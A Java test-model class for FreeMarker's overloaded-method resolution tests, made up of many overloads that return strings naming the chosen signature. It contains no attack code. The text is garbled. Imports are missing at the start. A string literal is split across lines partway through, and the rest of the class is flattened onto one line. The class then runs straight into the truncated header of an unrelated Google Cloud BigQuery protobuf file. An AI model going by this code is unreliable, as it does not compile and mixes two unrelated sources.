import java.util.Map;
import java.util.Set;

import freemarker.core.Environment;
import freemarker.ext.beans.RationalNumber;
import freemarker.ext.util.WrapperTemplateModel;
import freemarker.template.AdapterTemplateModel;
import freemarker.template.ObjectWrapper;
import freemarker.template.TemplateBooleanModel;
import freemarker.template.TemplateModel;
import freemarker.template.TemplateModelException;
import freemarker.template.TemplateNumberModel;
import freemarker.template.utility.StringUtil;
import freemarker.test.utility.TestUtil;

/**
 * Test model for the template test suite: a bean exposing many deliberately overloaded
 * methods used to pin down FreeMarker's overloaded-method resolution rules. Each method
 * returns a string that encodes WHICH overload was selected and with what arguments, so
 * the exact literals are part of the expected test output — do not "fix" apparent
 * copy-paste oddities in them (e.g. the "mmNumUnambigous won't be called" text below).
 */
public class OverloadedMethods2 {

    // Varargs vs. non-varargs selection; the joined args prove what was passed in.
    public String mVarargs(String... a1) {
        StringBuilder sb = new StringBuilder();
        for (String s : a1) {
            sb.append(s);
        }
        return "mVarargs(String... a1 = " + sb + ")";
    }

    public BigInteger bigInteger(BigDecimal n) {
        return n.toBigInteger();
    }

    public RationalNumber rational(int a, int b) {
        return new RationalNumber(a, b);
    }

    public String mVarargs(File a1, String... a2) {
        return "mVarargs(File a1, String... a2)";
    }

    public NumberAndStringModel getNnS(String s) {
        return new NumberAndStringModel(s);
    }

    // Null-argument dispatch: null must pick the String overload over the primitive one.
    public String mNull1(String a1) {
        return "mNull1(String a1 = " + a1 + ")";
    }

    public String mNull1(int a1) {
        return "mNull1(int a1 = " + a1 + ")";
    }

    public String mNull2(String a1) {
        return "mNull2(String a1 = " + a1 + ")";
    }

    public String mNull2(Object a1) {
        return "mNull2(Object a1 = " + a1 + ")";
    }

    // Symmetric signatures — neither is more specific overall.
    public String mSpecificity(Object a1, String a2) {
        return "mSpecificity(Object a1, String a2)";
    }

    public String mSpecificity(String a1, Object a2) {
        return "mSpecificity(String a1, Object a2)";
    }

    // Primitive vs. boxed pairs.
    public String mChar(char a1) {
        return "mChar(char a1 = " + a1 + ")";
    }

    public String mChar(Character a1) {
        return "mChar(Character a1 = " + a1 + ")";
    }

    public String mBoolean(boolean a1) {
        return "mBoolean(boolean a1 = " + a1 + ")";
    }

    public String mBoolean(Boolean a1) {
        return "mBoolean(Boolean a1 = " + a1 + ")";
    }

    public int mIntNonOverloaded(int a1) {
        return a1;
    }

    public String mIntPrimVSBoxed(int a1) {
        return "mIntPrimVSBoxed(int a1 = " + a1 + ")";
    }

    public String mIntPrimVSBoxed(Integer a1) {
        return "mIntPrimVSBoxed(Integer a1 = " + a1 + ")";
    }

    // Numeric widening between primitives / boxed types.
    public String mNumPrimVSPrim(short a1) {
        return "mNumPrimVSPrim(short a1 = " + a1 + ")";
    }

    public String mNumPrimVSPrim(long a1) {
        return "mNumPrimVSPrim(long a1 = " + a1 + ")";
    }

    public String mNumBoxedVSBoxed(Short a1) {
        return "mNumBoxedVSBoxed(Short a1 = " + a1 + ")";
    }

    public String mNumBoxedVSBoxed(Long a1) {
        return "mNumBoxedVSBoxed(Long a1 = " + a1 + ")";
    }

    // The 2-arg overload is never applicable with one argument, so dispatch is unambiguous.
    public String mNumUnambigous(Short a1, boolean otherOverload) {
        return "mmNumUnambigous won't be called";
    }

    public String mNumUnambigous(Integer a1) {
        return "mNumUnambigous(Integer a1 = " + a1 + ")";
    }

    // Full ladders of boxed numeric overloads.
    public String mNumBoxedAll(Byte a1) {
        return "mNumBoxedAll(Byte a1 = " + a1 + ")";
    }

    public String mNumBoxedAll(Short a1) {
        return "mNumBoxedAll(Short a1 = " + a1 + ")";
    }

    public String mNumBoxedAll(Integer a1) {
        return "mNumBoxedAll(Integer a1 = " + a1 + ")";
    }

    public String mNumBoxedAll(Long a1) {
        return "mNumBoxedAll(Long a1 = " + a1 + ")";
    }

    public String mNumBoxedAll(Float a1) {
        return "mNumBoxedAll(Float a1 = " + a1 + ")";
    }

    public String mNumBoxedAll(Double a1) {
        return "mNumBoxedAll(Double a1 = " + a1 + ")";
    }

    public String mNumBoxedAll(BigInteger a1) {
        return "mNumBoxedAll(BigInteger a1 = " + a1 + ")";
    }

    public String mNumBoxedAll(BigDecimal a1) {
        return "mNumBoxedAll(BigDecimal a1 = " + a1 + ")";
    }

    // Full ladders of primitive numeric overloads.
    public String mNumPrimAll(byte a1) {
        return "mNumPrimAll(byte a1 = " + a1 + ")";
    }

    public String mNumPrimAll(short a1) {
        return "mNumPrimAll(short a1 = " + a1 + ")";
    }

    public String mNumPrimAll(int a1) {
        return "mNumPrimAll(int a1 = " + a1 + ")";
    }

    public String mNumPrimAll(long a1) {
        return "mNumPrimAll(long a1 = " + a1 + ")";
    }

    public String mNumPrimAll(float a1) {
        return "mNumPrimAll(float a1 = " + a1 + ")";
    }

    public String mNumPrimAll(double a1) {
        return "mNumPrimAll(double a1 = " + a1 + ")";
    }

    public String mNumPrimAll(BigInteger a1) {
        return "mNumPrimAll(BigInteger a1 = " + a1 + ")";
    }

    public String mNumPrimAll(BigDecimal a1) {
        return "mNumPrimAll(BigDecimal a1 = " + a1 + ")";
    }

    // Partial ladders: only every second numeric type is present.
    public String mNumBoxedAll2nd(Short a1) {
        return "mNumBoxedAll2nd(Short a1 = " + a1 + ")";
    }

    public String mNumBoxedAll2nd(Long a1) {
        return "mNumBoxedAll2nd(Long a1 = " + a1 + ")";
    }

    public String mNumBoxedAll2nd(Double a1) {
        return "mNumBoxedAll2nd(Double a1 = " + a1 + ")";
    }

    public String mNumPrimAll2nd(short a1) {
        return "mNumPrimAll2nd(short a1 = " + a1 + ")";
    }

    public String mNumPrimAll2nd(long a1) {
        return "mNumPrimAll2nd(long a1 = " + a1 + ")";
    }

    public String mNumPrimAll2nd(double a1) {
        return "mNumPrimAll2nd(double a1 = " + a1 + ")";
    }

    // Fallback chains: specific numeric -> Number -> Object.
    public String mNumPrimFallbackToNumber(long a1) {
        return "mNumPrimFallbackToNumber(long a1 = " + a1 + ")";
    }

    public String mNumPrimFallbackToNumber(Number a1) {
        return "mNumPrimFallbackToNumber(Number a1 = " + a1 + ")";
    }

    // NOTE(review): continues past the chunk boundary below.
    public String mNumPrimFallbackToNumber(Object a1) {
        return
// NOTE(review): continuation of mNumPrimFallbackToNumber(Object) from above the chunk boundary.
"mNumPrimFallbackToNumber(Object a1 = " + a1 + ")";
    }

    public String mNumBoxedFallbackToNumber(Long a1) {
        return "mNumBoxedFallbackToNumber(Long a1 = " + a1 + ")";
    }

    public String mNumBoxedFallbackToNumber(Number a1) {
        return "mNumBoxedFallbackToNumber(Number a1 = " + a1 + ")";
    }

    public String mNumBoxedFallbackToNumber(Object a1) {
        return "mNumBoxedFallbackToNumber(Object a1 = " + a1 + ")";
    }

    // Conversions that would lose the decimal part vs. those that would not.
    public String mDecimalLoss(int a1) {
        return "mDecimalLoss(int a1 = " + a1 + ")";
    }

    public String mDecimalLoss(double a1) {
        return "mDecimalLoss(double a1 = " + a1 + ")";
    }

    // Lossy numeric conversion scenarios; the extra Object/String params steer applicability.
    public String mNumConversionLoses1(byte i, Object o1, Object o2) {
        return "byte " + i;
    }

    public String mNumConversionLoses1(double i, Object o1, Object o2) {
        return "double " + i;
    }

    public String mNumConversionLoses1(Number i, String o1, String o2) {
        return "Number " + i + " " + i.getClass().getName();
    }

    public String mNumConversionLoses2(int i, Object o1, Object o2) {
        return "int " + i;
    }

    public String mNumConversionLoses2(long i, Object o1, Object o2) {
        return "long " + i;
    }

    public String mNumConversionLoses2(Number i, String o1, String o2) {
        return "Number " + i + " " + i.getClass().getName();
    }

    public String mNumConversionLoses3(int i, Object o1, Object o2) {
        return "int " + i;
    }

    public String mNumConversionLoses3(Serializable i, String o1, String o2) {
        return "Serializable " + i + " " + i.getClass().getName();
    }

    // Pairwise primitive-width choices.
    public String nIntAndLong(int i) {
        return "nIntAndLong(int " + i + ")";
    }

    public String nIntAndLong(long i) {
        return "nIntAndLong(long " + i + ")";
    }

    public String nIntAndShort(int i) {
        return "nIntAndShort(int " + i + ")";
    }

    public String nIntAndShort(short i) {
        return "nIntAndShort(short " + i + ")";
    }

    public String nLongAndShort(long i) {
        return "nLongAndShort(long " + i + ")";
    }

    public String nLongAndShort(short i) {
        return "nLongAndShort(short " + i + ")";
    }

    // Varargs overload-selection scenarios.
    public String varargs1(String s, int... xs) {
        return "varargs1(String s = " + StringUtil.jQuote(s) + ", int... xs = " + TestUtil.arrayToString(xs) + ")";
    }

    public String varargs1(String s, double... xs) {
        return "varargs1(String s = " + StringUtil.jQuote(s) + ", double... xs = " + TestUtil.arrayToString(xs) + ")";
    }

    public String varargs1(String s, Object... xs) {
        return "varargs1(String s = " + StringUtil.jQuote(s) + ", Object... xs = " + TestUtil.arrayToString(xs) + ")";
    }

    public String varargs1(Object s, Object... xs) {
        return "varargs1(Object s = " + s + ", Object... xs = " + TestUtil.arrayToString(xs) + ")";
    }

    public String varargs2(int... xs) {
        return "varargs2(int... xs = " + TestUtil.arrayToString(xs) + ")";
    }

    public String varargs2(double... xs) {
        return "varargs2(double... xs = " + TestUtil.arrayToString(xs) + ")";
    }

    public String varargs3(String... xs) {
        return "varargs3(String... xs = " + TestUtil.arrayToString(xs) + ")";
    }

    public String varargs3(Comparable... xs) {
        return "varargs3(Comparable... xs = " + TestUtil.arrayToString(xs) + ")";
    }

    public String varargs3(Object... xs) {
        return "varargs3(Object... xs = " + TestUtil.arrayToString(xs) + ")";
    }

    public String varargs4(Integer... xs) {
        return "varargs4(Integer... xs = " + TestUtil.arrayToString(xs) + ")";
    }

    public String varargs4(int... xs) {
        return "varargs4(int... xs = " + TestUtil.arrayToString(xs) + ")";
    }

    // Fixed-arity prefixes competing with a pure varargs overload.
    public String varargs5(int... xs) {
        return "varargs5(int... xs = " + TestUtil.arrayToString(xs) + ")";
    }

    public String varargs5(int a1, int... xs) {
        return "varargs5(int a1 = " + a1 + ", int... xs = " + TestUtil.arrayToString(xs) + ")";
    }

    public String varargs5(int a1, int a2, int... xs) {
        return "varargs5(int a1 = " + a1 + ", int a2 = " + a2 + ", int... xs = " + TestUtil.arrayToString(xs) + ")";
    }

    public String varargs5(int a1, int a2, int a3, int... xs) {
        return "varargs5(int a1 = " + a1 + ", int a2 = " + a2 + ", int a3 = " + a3 + ", int... xs = " + TestUtil.arrayToString(xs) + ")";
    }

    public String varargs6(String a1, int... xs) {
        return "varargs6(String a1 = " + a1 + ", int... xs = " + TestUtil.arrayToString(xs) + ")";
    }

    public String varargs6(Object a1, int a2, int... xs) {
        return "varargs6(Object a1 = " + a1 + ", int a2 = " + a2 + ", int... xs = " + TestUtil.arrayToString(xs) + ")";
    }

    public String varargs7(int... xs) {
        return "varargs7(int... xs = " + TestUtil.arrayToString(xs) + ")";
    }

    public String varargs7(short a1, int... xs) {
        return "varargs7(short a1 = " + a1 + ", int... xs = " + TestUtil.arrayToString(xs) + ")";
    }

    // Null-dispatch where several overloads could accept null.
    public String mNullAmbiguous(String s) {
        return "mNullAmbiguous(String s = " + s + ")";
    }

    public String mNullAmbiguous(int i) {
        return "mNullAmbiguous(int i = " + i + ")";
    }

    public String mNullAmbiguous(File f) {
        return "mNullAmbiguous(File f = " + f + ")";
    }

    // NOTE(review): the mNullAmbiguous2 return strings are inconsistently labelled
    // ("mNullNonAmbiguous"/"mNullAmbiguous") — they look copy-pasted, but they are baked into
    // the suite's expected output; verify against the template tests before changing them.
    public String mNullAmbiguous2(String s) {
        return "mNullNonAmbiguous(String s = " + s + ")";
    }

    public String mNullAmbiguous2(File f) {
        return "mNullAmbiguous(File f = " + f + ")";
    }

    public String mNullAmbiguous2(Object o) {
        return "mNullAmbiguous(Object o = " + o + ")";
    }

    public String mNullNonAmbiguous(String s) {
        return "mNullNonAmbiguous(String s = " + s + ")";
    }

    public String mNullNonAmbiguous(int i) {
        return "mNullNonAmbiguous(int i = " + i + ")";
    }

    // Varargs tail that is present in one overload but absent in the other.
    public String mVarargsIgnoredTail(int i, double... ds) {
        return "mVarargsIgnoredTail(int i = " + i + ", double... ds = " + TestUtil.arrayToString(ds) + ")";
    }

    public String mVarargsIgnoredTail(int... is) {
        return "mVarargsIgnoredTail(int... is = " + TestUtil.arrayToString(is) + ")";
    }

    // A lower-ranked (primitive) signature that should still win the selection.
    public String mLowRankWins(int x, int y, Object o) {
        return "mLowRankWins(int x = " + x + ", int y = " + y + ", Object o = " + o + ")";
    }

    public String mLowRankWins(Integer x, Integer y, String s) {
        return "mLowRankWins(Integer x = " + x + ", Integer y = " + y + ", String s = " + s + ")";
    }

    // Unusual wrapping combinations (File/Object/String first arg, mixed double/Double).
    public String mRareWrappings(File f, double d1, Double d2, double d3, boolean b) {
        return "mRareWrappings(File f = " + f + ", double d1 = " + d1 + ", Double d2 = " + d2
                + ", double d3 = " + d3 + ", b = " + b + ")";
    }

    public String mRareWrappings(Object o, double d1, Double d2, Double d3, boolean b) {
        return "mRareWrappings(Object o = " + o + ", double d1 = " + d1 + ", Double d2 = " + d2
                + ", double d3 = " + d3 + ", b = " + b + ")";
    }

    public String mRareWrappings(String s, double d1, Double d2, Double d3, boolean b) {
        return "mRareWrappings(String s = " + s + ", double d1 = " + d1 + ", Double d2 = " + d2
                + ", double d3 = " + d3 + ", b = " + b + ")";
    }

    public String mRareWrappings2(String s) {
        return "mRareWrappings2(String s = " + s + ")";
    }

    public String mRareWrappings2(byte b) {
        return "mRareWrappings2(byte b = " + b + ")";
    }

    public File getFile() {
        return new File("file");
    }

    // Sequence-to-array conversion hints of varying quality.
    public String mSeqToArrayNonOverloaded(String[] items, String s) {
        return "mSeqToArrayNonOverloaded(String[] " + TestUtil.arrayToString(items) + ", String " + s + ")";
    }

    public String mSeqToArrayGoodHint(String[] items, String s) {
        return "mSeqToArrayGoodHint(String[] " + TestUtil.arrayToString(items) + ", String " + s + ")";
    }

    public String mSeqToArrayGoodHint(String[] items, int i) {
        return "mSeqToArrayGoodHint(String[] " + TestUtil.arrayToString(items) + ", int " + i + ")";
    }

    public String mSeqToArrayGoodHint2(String[] items, String s) {
        return "mSeqToArrayGoodHint2(String[] " + TestUtil.arrayToString(items) + ", String " + s + ")";
    }

    public String mSeqToArrayGoodHint2(String item) {
        return "mSeqToArrayGoodHint2(String " + item + ")";
    }

    public String mSeqToArrayPoorHint(String[] items, String s) {
        return "mSeqToArrayPoorHint(String[] " + TestUtil.arrayToString(items) + ", String " + s + ")";
    }

    public String mSeqToArrayPoorHint(String item, int i) {
        return "mSeqToArrayPoorHint(String " + item + ", int " + i + ")";
    }

    public String mSeqToArrayPoorHint2(String[] items) {
        return "mSeqToArrayPoorHint2(String[] " + TestUtil.arrayToString(items) + ")";
    }

    public String mSeqToArrayPoorHint2(String item) {
        return "mSeqToArrayPoorHint2(String " + item + ")";
    }

    public String mSeqToArrayPoorHint3(String[] items) {
        return "mSeqToArrayPoorHint3(String[] " + TestUtil.arrayToString(items) + ")";
    }

    public String mSeqToArrayPoorHint3(int[] items) {
        return "mSeqToArrayPoorHint3(int[] " + TestUtil.arrayToString(items) + ")";
    }

    // Preference between array and collection parameter shapes.
    public String mStringArrayVsListPreference(String[] items) {
        return "mStringArrayVsListPreference(String[] " + TestUtil.arrayToString(items) + ")";
    }

    public String mStringArrayVsListPreference(List items) {
        return "mStringArrayVsListPreference(List " + TestUtil.listToString(items) + ")";
    }

    public String mStringArrayVsObjectArrayPreference(String[] items) {
        return "mStringArrayVsObjectArrayPreference(String[] " + TestUtil.arrayToString(items) + ")";
    }

    public String mStringArrayVsObjectArrayPreference(Object[] items) {
        return "mStringArrayVsObjectArrayPreference(Object[] " + TestUtil.arrayToString(items) + ")";
    }

    public String mIntArrayVsIntegerArrayPreference(int[] items) {
        return "mIntArrayVsIntegerArrayPreference(int[] " + TestUtil.arrayToString(items) + ")";
    }

    public String mIntArrayVsIntegerArrayPreference(Integer[] items) {
        return "mIntArrayVsIntegerArrayPreference(Integer[] " + TestUtil.arrayToString(items) + ")";
    }

    public String mIntArrayNonOverloaded(int[] items) {
        return "mIntArrayNonOverloaded(int[] " + TestUtil.arrayToString(items) + ")";
    }

    public String mIntegerArrayNonOverloaded(Integer[] items) {
        return "mIntegerArrayNonOverloaded(Integer[] " + TestUtil.arrayToString(items) + ")";
    }

    public String mIntegerListNonOverloaded(List<Integer> items) {
        return "mIntegerListNonOverloaded(List<Integer> " + items + ")";
    }

    public String mStringListNonOverloaded(List<String> items) {
        return "mStringListNonOverloaded(List<String> " + items + ")";
    }

    public String mStringArrayNonOverloaded(String[] items) {
        return "mStringArrayNonOverloaded(String[] " + TestUtil.arrayToString(items) + ")";
    }

    public String mObjectListNonOverloaded(List<Object> items) {
        return "mObjectListNonOverloaded(List<Object> " + items + ")";
    }

    public String mObjectArrayNonOverloaded(Object[] items) {
        return "mObjectArrayNonOverloaded(Object[] " + TestUtil.arrayToString(items) + ")";
    }

    // Array-typed first parameter vs. a catch-all (Object, boolean) overload.
    public String mIntegerArrayOverloaded(Integer[] items, int i) {
        return "mIntegerArrayOverloaded(Integer[] " + TestUtil.arrayToString(items) + ", int " + i + ")";
    }

    public String mIntegerArrayOverloaded(Object obj, boolean b) {
        return "mIntegerArrayOverloaded(Object " + obj + ", boolean " + b + ")";
    }

    public String mStringArrayOverloaded(String[] items, int i) {
        return "mStringArrayOverloaded(String[] " + TestUtil.arrayToString(items) + ", int " + i + ")";
    }

    public String mStringArrayOverloaded(Object obj, boolean b) {
        return "mStringArrayOverloaded(Object " + obj + ", boolean " + b + ")";
    }

    public String mCharArrayOverloaded(char[] items, int i) {
        return "mCharArrayOverloaded(char[] " + TestUtil.arrayToString(items) + ", int " + i + ")";
    }

    public String mCharArrayOverloaded(Character[] items, String s) {
        return "mCharArrayOverloaded(Character[] " + TestUtil.arrayToString(items) + ", String " + s + ")";
    }

    public String mCharArrayOverloaded(Object obj, boolean b) {
        return "mCharArrayOverloaded(Object " + obj + ", boolean " + b + ")";
    }

    public String mStringArrayArrayOverloaded(String[][] arrayArray, int i) {
        return "mStringArrayArrayOverloaded(String[][] " + TestUtil.arrayToString(arrayArray) + ", int " + i + ")";
    }

    // NOTE(review): cut off at the end of the chunk — this overload continues past the visible source.
    public String mStringArrayArrayOverloaded(Object obj, boolean b) { return "mStringArrayArrayOverloaded(Object
" + obj + ", boolean " + b + ")"; } public String mIntArrayArrayOverloaded(int[][] xss) { return "mIntArrayArrayOverloaded(" + TestUtil.arrayToString(xss) + ")"; } public String mIntArrayArrayOverloaded(String s) { return "mIntArrayArrayOverloaded(" + s + ")"; } public String mArrayOfListsOverloaded(List[] xss) { return "mArrayOfListsOverloaded(" + TestUtil.arrayToString(xss) + ")"; } public String mArrayOfListsOverloaded(String x) { return "mArrayOfListsOverloaded(" + x + ")"; } public String mIntArrayArrayNonOverloaded(int[][] xss) { return "mIntArrayArrayNonOverloaded(" + TestUtil.arrayToString(xss) + ")"; } public String mArrayOfListsNonOverloaded(List[] xss) { return "mArrayOfListsNonOverloaded(" + TestUtil.arrayToString(xss) + ")"; } public String mStringArrayVarargsNonOverloaded(String... items) { return "mStringArrayVarargsNonOverloaded(String[] " + TestUtil.arrayToString(items) + ")"; } public String mStringArrayVarargsOverloaded(String... items) { return "mStringArrayVarargsNonOverloaded(String[] " + TestUtil.arrayToString(items) + ")"; } public String mStringArrayVarargsOverloaded1(String... items) { return "mStringArrayVarargsOverloaded1(String[] " + TestUtil.arrayToString(items) + ")"; } public String mStringArrayVarargsOverloaded1(List<String> items) { return "mStringArrayVarargsOverloaded1(List " + TestUtil.listToString(items) + ")"; } public String mStringArrayVarargsOverloaded2(String... items) { return "mStringArrayVarargsOverloaded2(String[] " + TestUtil.arrayToString(items) + ")"; } public String mStringArrayVarargsOverloaded2(String item) { return "mStringArrayVarargsOverloaded2(String " + item + ")"; } public String mStringArrayVarargsOverloaded3(String... 
items) { return "mStringArrayVarargsOverloaded3(String[] " + TestUtil.arrayToString(items) + ")"; } public String mStringArrayVarargsOverloaded3(String item1, String item2) { return "mStringArrayVarargsOverloaded3(String " + item1 + ", String " + item2 + ")"; } public String mStringArrayVarargsOverloaded4(String... items) { return "mStringArrayVarargsOverloaded4(String[] " + TestUtil.arrayToString(items) + ")"; } public String mStringArrayVarargsOverloaded4(List... items) { return "mStringArrayVarargsOverloaded4(List[] " + TestUtil.arrayToString(items) + ")"; } public String mListOrString(List<String> items) { return "mListOrString(List " + TestUtil.listToString(items) + ")"; } public String mListOrString(String item) { return "mListOrString(String " + item + ")"; } public String mListListOrString(List<List<Object>> items) { return "mListListOrString(List " + TestUtil.listToString(items) + ")"; } public String mListListOrString(String item) { return "mListListOrString(String " + item + ")"; } public String mMapOrBoolean(Map v) { return "mMapOrBoolean(Map " + v + ")"; } public String mMapOrBoolean(boolean v) { return "mMapOrBoolean(boolean " + v + ")"; } public String mMapOrBooleanVarargs(Map... v) { return "mMapOrBooleanVarargs(Map... " + TestUtil.arrayToString(v) + ")"; } public String mMapOrBooleanVarargs(boolean... v) { return "mMapOrBooleanVarargs(boolean... " + TestUtil.arrayToString(v) + ")"; } public String mMapOrBooleanFixedAndVarargs(Map v) { return "mMapOrBooleanFixedAndVarargs(Map " + v + ")"; } public String mMapOrBooleanFixedAndVarargs(boolean v) { return "mMapOrBooleanFixedAndVarargs(boolean " + v + ")"; } public String mMapOrBooleanFixedAndVarargs(Map... v) { return "mMapOrBooleanFixedAndVarargs(Map... " + TestUtil.arrayToString(v) + ")"; } public String mMapOrBooleanFixedAndVarargs(boolean... v) { return "mMapOrBooleanFixedAndVarargs(boolean... 
" + TestUtil.arrayToString(v) + ")"; } public String mNumberOrArray(Number v) { return "mNumberOrArray(Number " + v + ")"; } public String mNumberOrArray(Object[] v) { return "mNumberOrArray(Object[] " + TestUtil.arrayToString(v) + ")"; } public String mIntOrArray(int v) { return "mIntOrArray(int " + v + ")"; } public String mIntOrArray(Object[] v) { return "mIntOrArray(Object[] " + TestUtil.arrayToString(v) + ")"; } public String mDateOrArray(Date v) { return "mDateOrArray(Date " + v.getTime() + ")"; } public String mDateOrArray(Object[] v) { return "mDateOrArray(Object[] " + TestUtil.arrayToString(v) + ")"; } public String mStringOrArray(String v) { return "mStringOrArray(String " + v + ")"; } public String mStringOrArray(Object[] v) { return "mStringOrArray(Object[] " + TestUtil.arrayToString(v) + ")"; } public String mBooleanOrArray(boolean v) { return "mBooleanOrArray(boolean " + v + ")"; } public String mBooleanOrArray(Object[] v) { return "mBooleanOrArray(Object[] " + TestUtil.arrayToString(v) + ")"; } public String mMapOrArray(Map v) { return "mMapOrArray(Map " + v + ")"; } public String mMapOrArray(Object[] v) { return "mMapOrArray(Object[] " + TestUtil.arrayToString(v) + ")"; } public String mListOrArray(List v) { return "mListOrArray(List " + v + ")"; } public String mListOrArray(Object[] v) { return "mListOrArray(Object[] " + TestUtil.arrayToString(v) + ")"; } public String mSetOrArray(Set v) { return "mSetOrArray(Set " + v + ")"; } public String mSetOrArray(Object[] v) { return "mSetOrArray(Object[] " + TestUtil.arrayToString(v) + ")"; } public String mCharNonOverloaded(char c) { return "mCharNonOverloaded(char " + c + ")"; } public String mCharacterNonOverloaded(Character c) { return "mCharacterNonOverloaded(Character " + c + ")"; } public String mCharOrCharacterOverloaded(char c) { return "mCharOrCharacterOverloaded(char " + c + ")"; } public String mCharOrCharacterOverloaded(Character c) { return "mCharOrCharacterOverloaded(Character " + c + ")"; } 
public String mCharOrBooleanOverloaded(char c) { return "mCharOrBooleanOverloaded(char " + c + ")"; } public String mCharOrBooleanOverloaded(boolean b) { return "mCharOrBooleanOverloaded(boolean " + b + ")"; } public String mCharOrStringOverloaded(char c, boolean b) { return "mCharOrStringOverloaded(char " + c + ", boolean " + b + ")"; } public String mCharOrStringOverloaded(String s, int i) { return "mCharOrStringOverloaded(String " + s + ", int " + i + ")"; } public String mCharacterOrStringOverloaded(Character c, boolean b) { return "mCharacterOrStringOverloaded(Character " + c + ", boolean " + b + ")"; } public String mCharacterOrStringOverloaded(String s, int i) { return "mCharacterOrStringOverloaded(String " + s + ", int " + i + ")"; } public String mCharOrStringOverloaded2(String s) { return "mCharOrStringOverloaded2(String " + s + ")"; } public String mCharOrStringOverloaded2(char c) { return "mCharOrStringOverloaded2(char " + c + ")"; } public String mCharacterOrStringOverloaded2(String s) { return "mCharacterOrStringOverloaded2(String " + s + ")"; } public String mCharacterOrStringOverloaded2(Character c) { return "mCharacterOrStringOverloaded2(Character " + c + ")"; } public String getJavaString() { return "s"; } public List getJavaStringList() { List list = new ArrayList(); list.add("a"); list.add("b"); return list; } public List getJavaString2List() { List list = new ArrayList(); list.add("aa"); list.add("bb"); return list; } public List getJavaStringListList() { List listList = new ArrayList(); { List list = new ArrayList(); list.add("a"); list.add("b"); listList.add(list); } { List list = new ArrayList(); list.add("c"); listList.add(list); } return listList; } public List getJavaStringSequenceList() throws TemplateModelException { ObjectWrapper ow = Environment.getCurrentEnvironment().getObjectWrapper(); List listList = new ArrayList(); { List list = new ArrayList(); list.add("a"); list.add("b"); listList.add(ow.wrap(list)); } { List list = new 
ArrayList(); list.add("c"); listList.add(ow.wrap(list)); } return listList; } public List<int[]> getJavaListOfIntArrays() { List list = new ArrayList(); list.add(new int[] {1, 2, 3}); list.add(new int[] {}); list.add(new int[] {4}); return list; } @SuppressWarnings("boxing") public List getJavaIntegerListList() { List listList = new ArrayList(); { List list = new ArrayList(); list.add(1); list.add(2); listList.add(list); } { List list = new ArrayList(); list.add(3); listList.add(list); } return listList; } @SuppressWarnings("boxing") public List<Integer> getJavaIntegerList() { List<Integer> list = new ArrayList<>(); list.add(1); list.add(2); return list; } @SuppressWarnings("boxing") public List<Byte> getJavaByteList() { List<Byte> list = new ArrayList<>(); list.add((byte) 1); list.add((byte) 2); return list; } @SuppressWarnings("boxing") public List<Character> getJavaCharacterList() { List<Character> list = new ArrayList<>(); list.add('c'); list.add('C'); return list; } public String[] getJavaStringArray() { return new String[] { "a", "b" }; } public int[] getJavaIntArray() { return new int[] { 11, 22 }; } public Integer[] getJavaIntegerArray() { return new Integer[] { Integer.valueOf(11), Integer.valueOf(22) }; } public String[] getJavaEmptyStringArray() { return new String[] { }; } public String[][] getJavaStringArrayArray() { return new String[][] { new String[] { "a", "b" }, new String[] { }, new String[] { "c" } }; } public Object[] getJavaObjectArray() { return new Object[] { "a", "b" }; } public TemplateModel getHashAndScalarModel() { return HashAndScalarModel.INSTANCE; } public TemplateModel getBooleanAndScalarModel() { return BooleanAndScalarModel.INSTANCE; } public TemplateModel getAllModels() { return AllTemplateModels.INSTANCE; } public TemplateNumberModel getAdaptedNumber() { return new MyAdapterNumberModel(); } public TemplateNumberModel getWrapperNumber() { return new MyWrapperNumberModel(); } public TemplateBooleanModel getStringAdaptedToBoolean() 
{ return new MyStringAdaptedToBooleanModel(); } public TemplateBooleanModel getStringAdaptedToBoolean2() { return new MyStringAdaptedToBooleanModel2(); } public TemplateBooleanModel getStringWrappedAsBoolean() { return new MyStringWrapperAsBooleanModel(); } public TemplateBooleanModel getBooleanWrappedAsAnotherBoolean() { return new MyBooleanWrapperAsAnotherBooleanModel(); } public String bugReport363(Map<String, ?> fields, List<?> listField) { return "Executed: testMethod(Map fields, List listField) on input: fields=" + fields + " and listField=" + listField; } public String bugReport363(Object... fields) { return "Executed: testMethod(Object... fields) on input: fields=" + TestUtil.arrayToString(fields); } private static class MyAdapterNumberModel implements TemplateNumberModel, AdapterTemplateModel { public Object getAdaptedObject(Class hint) { if (hint == double.class) { return Double.valueOf(123.0001); } else if (hint == Double.class) { return Double.valueOf(123.0002); } else { return Long.valueOf(124L); } } public Number getAsNumber() throws TemplateModelException { return Integer.valueOf(122); } } private static class MyWrapperNumberModel implements TemplateNumberModel, WrapperTemplateModel { public Number getAsNumber() throws TemplateModelException { return Integer.valueOf(122); } public Object getWrappedObject() { return Double.valueOf(123.0001); } } private static class MyStringWrapperAsBooleanModel implements TemplateBooleanModel, WrapperTemplateModel { public Object getWrappedObject() { return "yes"; } public boolean getAsBoolean() throws TemplateModelException { return true; } } private static class MyBooleanWrapperAsAnotherBooleanModel implements TemplateBooleanModel, WrapperTemplateModel { public Object getWrappedObject() { return Boolean.TRUE; } public boolean getAsBoolean() throws TemplateModelException { return false; } } private static class MyStringAdaptedToBooleanModel implements TemplateBooleanModel, AdapterTemplateModel { public Object 
getAdaptedObject(Class hint) { if (hint != Boolean.class && hint != boolean.class) { return "yes"; } else { return Boolean.TRUE; } } public boolean getAsBoolean() throws TemplateModelException { return false; } } private static class MyStringAdaptedToBooleanModel2 implements TemplateBooleanModel, AdapterTemplateModel { public Object getAdaptedObject(Class hint) { return "yes"; } public boolean getAsBoolean() throws TemplateModelException { return true; } } }
googleapis/google-cloud-java
35,794
java-bigquerydatapolicy/proto-google-cloud-bigquerydatapolicy-v2beta1/src/main/java/com/google/cloud/bigquery/datapolicies/v2beta1/RemoveGranteesRequest.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/bigquery/datapolicies/v2beta1/datapolicy.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.bigquery.datapolicies.v2beta1; /** * * * <pre> * Request message for the RemoveGrantees method. * </pre> * * Protobuf type {@code google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest} */ public final class RemoveGranteesRequest extends com.google.protobuf.GeneratedMessageV3 implements // 